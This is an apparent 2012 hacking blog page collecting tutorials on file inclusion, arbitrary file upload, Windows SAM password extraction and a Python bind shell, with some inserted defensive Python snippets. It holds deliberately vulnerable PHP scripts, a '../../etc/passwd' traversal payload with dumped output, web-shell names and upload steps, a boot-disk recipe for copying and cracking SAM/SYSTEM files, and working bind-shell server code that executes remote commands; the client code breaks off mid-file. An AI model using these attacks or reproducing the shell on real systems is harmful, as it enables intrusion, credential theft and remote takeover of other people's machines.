Thursday, February 23, 2012

Understanding LFI and RFI Attacks


Local File Inclusion (LFI) is a method of including files on a server through a specially crafted HTTP request. This vulnerability can be exploited using a web browser and thus can be very easy to exploit. The vulnerability occurs when user-supplied data is passed, without sanitizing, to an inclusion function such as include() or require(). Mostly these attacks are accompanied by directory traversal attacks, which can reveal sensitive data and lead to further attacks.

Now that’s quite a bit of theory; let’s have a look at a sample vulnerable application.


Demonstration [Proof of Concept]



I have created a pair of files named index.html and lfi.php.

lfi.php
Code:
  <html>
  <head>
  <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>
  <body>
  <?php
  // The PHP and HTML tags of this listing were lost when the page was
  // extracted; the logic is restored from the description below.
  // The request parameter name is an assumption.
  $page = $_GET['page'];
  echo "Welcome to this Website<br /><br />";
  echo "You are currently at $page";
  include($page);   // include(USER_INPUT): nothing checks what $page points to
  ?>
  </body>
  </html>
As you see, the above code includes whatever it is given (include(USER_INPUT)). So basically we can input any filename and it will simply print that file’s contents on the screen. This is the most popular form in which these bugs occur.
index.html
Code:
  Hello I am a sample page my name is index.html
Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-
Code:
  Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html
It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string


As I am working on UNIX, we’ll print out the contents of the /etc/passwd file. The file /etc/passwd is a local source of information about users’ accounts.

My present working directory is /var/www/, so what I have to do is:
  1. Go back 2 directories and
  2. Then go to /etc/passwd
We can go back 2 directories using ‘../../’

Attack string :-

Code:
  ../../etc/passwd
Now let’s feed this as an input and see what happens.

Input: “../../etc/passwd”

Code:
  Welcome to this Website

  You are currently at ../../etc/passwd
  root:x:0:1:Super-User:/root:/sbin/sh
  daemon:x:1:1::/:
  bin:x:2:2::/usr/bin:
  sys:x:3:3::/:
  adm:x:4:4:Admin:/var/adm:
  lp:x:71:8:Line Printer Admin:/usr/spool/lp:
  uucp:x:5:5:uucp Admin:/usr/lib/uucp:
  nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/
And voila! We just printed the /etc/passwd file.

Remote File Inclusion



RFI is an abbreviation for Remote File Inclusion and is quite similar to LFI. Remote File Inclusion (RFI) is a method of including remote files (present on another server) on a server through a specially crafted HTTP request. This vulnerability can be exploited using a web browser and thus can be very easy to exploit. The vulnerability occurs when user-supplied data is passed, without sanitizing, to an inclusion function such as include() or require(). In PHP, including a URL this way only works when the allow_url_include setting is enabled; it is off by default in current releases.

Demonstration [Proof of Concept]



We’ll be using the same sample web app we used to demonstrate LFI.

Constructing the attack string:-

In our case we want to include go4expert’s index page through our local script.

So what we have to do is simply provide the URL as an input and see what happens.

Input : http://go4expert.com

Output (page source):-
Code:
  Vulnerable to LFI -- by lionaneesh

  Welcome to this Website

  You are currently at http://go4expert.com
  Programming and SEO Forums --------Sniped-----------
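An added example, not from the original post: the checks that lfi.php lacks, written in Python so it runs stand-alone even though the page’s script is PHP. It refuses both attack strings used above (the traversal string and the remote URL); the allowlist, the web root and the helper names are assumptions.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Constructed web root holding the page's own index.html (demo only).
WEB_ROOT = tempfile.mkdtemp(prefix="lfi-demo-")
with open(os.path.join(WEB_ROOT, "index.html"), "w") as fh:
    fh.write("Hello I am a sample page my name is index.html\n")

ALLOWED_PAGES = {"index.html"}  # assumed allowlist of includable pages

class RejectedPage(ValueError):
    """Raised when the requested page fails a safety check."""

def resolve_page(user_input, base=WEB_ROOT):
    """Return an absolute path that is safe to include, or raise RejectedPage.
    1. a URL scheme or host is refused (blocks RFI);
    2. names outside the allowlist are refused (blocks LFI by construction);
    3. the resolved real path must still sit under base (guards traversal
       and symlink tricks if the allowlist is ever loosened)."""
    parts = urlsplit(user_input)
    if parts.scheme or parts.netloc:
        raise RejectedPage("remote inclusion refused: %r" % user_input)
    name = user_input.strip()
    if name not in ALLOWED_PAGES:
        raise RejectedPage("page not in allowlist: %r" % user_input)
    real_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(real_base, name))
    if os.path.commonpath([real_base, candidate]) != real_base:
        raise RejectedPage("path escapes web root: %r" % user_input)
    return candidate

def page_rejected(user_input):
    """True when resolve_page() refuses the input."""
    try:
        resolve_page(user_input)
    except RejectedPage:
        return True
    return False

def render(user_input):
    """Mirror lfi.php's output, but only for pages resolve_page() accepts."""
    try:
        path = resolve_page(user_input)
    except RejectedPage as exc:
        return "Welcome to this Website\nRequest refused (%s)\n" % exc
    with open(path) as fh:
        body = fh.read()
    return "Welcome to this Website\nYou are currently at %s\n%s" % (user_input, body)
```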

Understanding Arbitrary File Upload Vulnerabilities

As the name suggests, an arbitrary file upload vulnerability occurs in a web application when the type of an uploaded file is not checked, filtered or sanitized.

The main danger of this kind of vulnerability is that the attacker can upload a malicious PHP, ASP, etc. script and execute it. The main idea is to get access to the server and execute desired code. For example, an attacker who has found such a vulnerability can upload a malicious shell script and then use it to make the machine execute desired commands, which would lead to a full compromise of the victim’s server.

In this tutorial we’ll be looking at a basic example of a vulnerable script and how to exploit it. So let’s get started.


Proof of Concept



For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php
Code:
  <?php
  // The PHP and HTML tags of this listing were lost when the page was
  // extracted; the logic is restored from the description below.
  // The form field name and the upload directory are assumptions.
  if (isset($_FILES['file'])) {
      // client-chosen filename, no check on type or extension
      $target = "uploads/" . $_FILES['file']['name'];
      if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
          echo "File uploaded <a href='$target'>HERE</a>";
      }
  }
  ?>
  <html>
  <head>
  <title>Welcome to Vulnerable Apps</title>
  </head>
  <body>
  <h1>Arbitary file upload ( POC )</h1>
  <p>Hey all this is a sample php script to upload image files , This script
  doesn't contains file type checking code which makes it prone to Arbitary
  file upload vulnerbility.</p>
  <form method="post" enctype="multipart/form-data">
  Upload <input type="file" name="file" />
  <input type="submit" value="Upload File" />
  </form>
  </body>
  </html>
In the above script we simply ask the user for the file to be uploaded and, without even checking what its file type or extension is, we store it.

This is a basic example of how these bugs occur.
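An added example, not the page’s code: the validation that Upload.php skips, in Python so it can be run stand-alone. The allowed types, size limit, random server-side name and sample payloads are assumptions; the stored name never carries a script extension, and the upload directory stands in for one outside the web root.

```python
import os
import re
import secrets
import tempfile

# Allowed extensions and the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024                                 # assumed limit
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)")   # exactly one extension
UPLOAD_DIR = tempfile.mkdtemp(prefix="upload-demo-")        # stand-in for a dir outside the web root

# Constructed sample payloads (not real uploads).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"

class UploadRejected(ValueError):
    """Raised when an upload fails validation."""

def validate_upload(client_name, data):
    """Return the extension to store under, or raise UploadRejected."""
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any client path
    m = SAFE_NAME.fullmatch(base)
    if not m:                     # also rejects shell.php.jpg and traversal names
        raise UploadRejected("filename not in the allowed shape: %r" % client_name)
    ext = m.group(1).lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed: %r" % ext)
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    if not data.startswith(ALLOWED_TYPES[ext]):   # claimed type must match content
        raise UploadRejected("content does not look like a %s" % ext)
    return ext

def upload_rejected(client_name, data):
    """True when validate_upload() refuses the upload."""
    try:
        validate_upload(client_name, data)
    except UploadRejected:
        return True
    return False

def store_upload(client_name, data, upload_dir=UPLOAD_DIR):
    """Validate, then write under a server-chosen random name (never the client's)."""
    ext = validate_upload(client_name, data)
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    return stored
```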

How to exploit it



Exploiting this common bug is simpler still: the attacker can simply download any web shell script written in PHP, ASP, etc.

Some PHP shells:-

Ani-Shell
R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the attacker has to carry out these steps:-
  1. Upload the shell
  2. Go to the link
  3. Gain access


All about SAM

Section 1 : General Information
As you may or may not know, all of the passwords on a Windows XP computer are stored in a SAM file. This file is located on your computer’s hard drive in the directory “C:\WINDOWS\System32\Config”. The file’s name is SAM, obviously. Now, you may be thinking, “Wow, this was incredibly easy, I just right click the file and click send to a floppy or wherever.” Well, unfortunately, it isn’t that simple. I will detail the various methods of getting the SAM file in the next section.

Section 2 : Obtaining the SAM file
In the previous section, I discussed where the SAM file was found. As you may have found out, when you attempt to copy this file, you get a nasty error saying something along the lines of “Access is denied. File is in use.” The SAM file is in use by the system, so you cannot just go to task manager, and end the process. You need to find alternate methods of starting up the computer without using the SAM file. As far as I know, this can be done several ways.

Booting the computer up into Linux using a boot CD or floppy is one method. To use this method, you will need a Linux Boot CD, and access to BIOS. If you don’t have access to BIOS then consult one of the many tutorials on the web on how to crack the BIOS password.

To make a bootable Linux CD, you have to find a version of Linux which can be burned and run off a CD (to find these, consult my links, or search Google). This should be relatively easy to find. Next you need some kind of burning software which allows you to burn an image onto a CD (consult links, or search Google). This is a bit harder to find for free, but a demo works just fine. After you have these, burn the image to the CD. You now have a Linux Boot CD.

Now to alter the BIOS settings, so that you can boot into Linux from the CD. Shut down your computer, and during the start up screen, you should see a notice to press F1 or F8 (Maybe a different key) to enter Boot setup. Press it. This will take you into the BIOS, however, if there is a password on the BIOS, then you have to consult an article about cracking BIOS passwords. Next go to Boot Order and change the CD drive to first. Save your changes, insert your Linux CD and exit. Let the system boot up. It should boot into Linux if you did everything correctly. Now all you have to do is insert a blank floppy, and copy the SAM file to it, since it is not in use anymore because Windows is not running. Congratulations, you now have the SAM file. Be sure to get the SYSTEM file in the same directory as well, as some passwords are encrypted with keys from within that file.

Another, somewhat easier way of obtaining the files is using an MS-DOS boot disk. This method doesn’t require you to go looking for software or to use special burning software. Just insert a floppy, right click on it in My Computer, and click on format floppy. When the menu appears, mark the box for “Create a MS-DOS startup boot disk” and then click the start button. After you have made your disk, restart your computer with the disk still in the drive. Make sure your BIOS settings boot from the floppy drive before the hard drive.

When the computer boots, you should see a screen similar to a command prompt; “A:>” is most likely the prompt you will see. First you need to change to the C drive. This is done in various ways on different computers; “cd C:” or “C:” usually works. Next you will need to use the copy command to copy the SAM and SYSTEM files to other areas of the hard drive. The syntax for the copy command is as follows, without the quotes: “copy (file to be copied) (destination)”, so the correct command which will get the file for you is “copy C:\WINDOWS\System32\Config\SAM C:\”. This will copy the SAM file to the C drive. Replace “SAM” with “SYSTEM” to get the SYSTEM file.

Next you might want to rename these files. This is the syntax for the rename command: “ren (file to be renamed) (new file name)”. The command which will rename your files for you is “ren C:\SAM Whatever” if you saved it to the C drive. This will rename your SAM file to Whatever. Now restart your computer without the boot disk in and start up Windows. Copy the files onto a floppy. Note: you may have to zip it, as the SYSTEM file is pretty big. The reason these methods work is that the SAM file is not in use when you aren’t running Windows, and when you copied and renamed the file, it did not get used by Windows when you logged on. Now on to the easy part, cracking the SAM file.

Section 3 : Cracking the SAM file
There is a wealth of programs available that will crack the SAM file for you. You can also attempt to crack it by hand. Having neither the time nor the skill required to do this, I used a program. Some programs I recommend are SAMInside, which unfortunately costs money; Proactive Windows Security Explorer, which can actually import the SAM file from memory, so you will not need to obtain it yourself if you are doing this on your home computer; and of course Cain & Abel will do the trick as well. Most of these programs test about 4 to 5 million passwords per second, at least on my machine, so if the password is below 7 characters, it should be able to crack it in one day. However, if the password is 7 or more characters in length, then it will take a substantial amount of time. When I did this, my password was 7 characters in length and it took my computer just over 3 days to crack it.

Bind Shell and Client in Python

“Bind Shell” is often used to describe a program or piece of shellcode which binds to a specific port on a machine and lets other machines (i.e. the attacker) connect and execute shell commands on the victim machine.

In this article we'll be looking at a basic implementation of Bind Shell and Client coded in python.


The Code



The code is split across two files, server.py and client.py.

Server

The server.py program simply listens on the specified port (default: 31337) and provides “shell” access to the machines that connect.

Code:
  #!/usr/bin/env python
  # Server (Python 2 syntax, as in the original)

  import sys
  import socket
  import os

  host = '';
  SIZE = 512;

  try :
      port = int(sys.argv[1]);   # bind() and the %d format below need an int, not the argv string
  except :
      port = 31337;

  try :
      sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);
  except socket.error , e :
      print "Error in creating socket : ",e ;
      sys.exit(1);

  sockfd.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1);

  try :
      sockfd.bind((host,port));
  except socket.error , e :
      print "Error in Binding : ",e;
      sys.exit(1);

  print("\n\n======================================================");
  print("-------- Server Listening on Port %d --------------" % port);
  print("======================================================\n\n");

  try :
      while 1 : # listen for connections
          sockfd.listen(1);
          clientsock , clientaddr = sockfd.accept();
          print("\n\nGot Connection from " + str(clientaddr));
          while 1 :
              try :
                  cmd = clientsock.recv(SIZE);
              except :
                  break;
              if not cmd : # empty read means the client went away
                  break;

              print(cmd);

              if cmd == 'g2g': # close the connection and move on for others
                  print("\n-----------Connection Closed----------------");
                  clientsock.shutdown(socket.SHUT_RDWR);   # shutdown() requires a "how" argument
                  break;

              pipe = os.popen(cmd);
              rawOutput = pipe.readlines();

              try :
                  output = "";
                  # Parse the output from list to string
                  for data in rawOutput :
                      output = output+data;

                  clientsock.send("Command Output :- \n"+output+"\r\n");
              except socket.error , e :
                  print("\n-----------Connection Closed--------");
                  clientsock.close();
                  break;
  except KeyboardInterrupt :
      print("\n\n>>>> Server Terminated <<<<<\n");
      print("===========================================================");
      print("\tThanks for using Simple-CMD");
      print("\tEmail : lionaneesh@gmail.com");
      print("============================================================");
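An added defender-side example, not part of the original post: a baseline check over `ss -ltnp` output that flags a listener like the one server.py opens on its default port 31337, or a known port owned by an unexpected process. The sample output, the baseline and the function names are constructed assumptions.

```python
import re

# Constructed sample of `ss -ltnp` output (not captured from a real host);
# the 31337 entry mirrors server.py's default port.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:80          0.0.0.0:*          users:(("nginx",pid=1043,fd=6))
LISTEN  0       128     127.0.0.1:3306      0.0.0.0:*          users:(("mysqld",pid=990,fd=21))
LISTEN  0       1       0.0.0.0:31337       0.0.0.0:*          users:(("python",pid=2291,fd=3))
"""

# Assumed baseline: port -> process name allowed to own it.
BASELINE = {22: "sshd", 80: "nginx", 3306: "mysqld"}

LISTEN_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def parse_listeners(ss_output):
    """Turn `ss -ltnp` text into dicts with addr, port, proc and pid."""
    found = []
    for line in ss_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["pid"] = int(entry["pid"])
            found.append(entry)
    return found

def unexpected_listeners(listeners, baseline=BASELINE):
    """Flag listeners on ports missing from the baseline or owned by the wrong process."""
    findings = []
    for entry in listeners:
        expected = baseline.get(entry["port"])
        if expected is None:
            reason = "port not in baseline"
        elif expected != entry["proc"]:
            reason = "expected %s, found %s" % (expected, entry["proc"])
        else:
            continue
        findings.append(dict(entry, reason=reason))
    return findings

def audit(ss_output=SAMPLE_SS_OUTPUT, baseline=BASELINE):
    """Parse and check in one step; returns the list of findings."""
    return unexpected_listeners(parse_listeners(ss_output), baseline)
```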
Client

The client.py program connects to the server and sends the commands to be executed.

Code:
 #!/usr/bin/env python  
 # Simple network client  

 import socket;  
 import sys;  
 
 port = 31337;    # The port is hardcoded; if you are changing this, change the same on the server
 SIZE = 1000;  
 
 try :  
     host = sys.argv[1];  
 except :     # Add localhost as the server if no host provided  
     host = "127.0.0.1";  
 
 try :  
     sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);  
 
 except socket.error , e :  
       
     print "Error while Creating socket : ",e ;      
     sys.exit(1);  
 
 try :  
     sockfd.connect((host,port));  
 
 except socket.gaierror , e :  
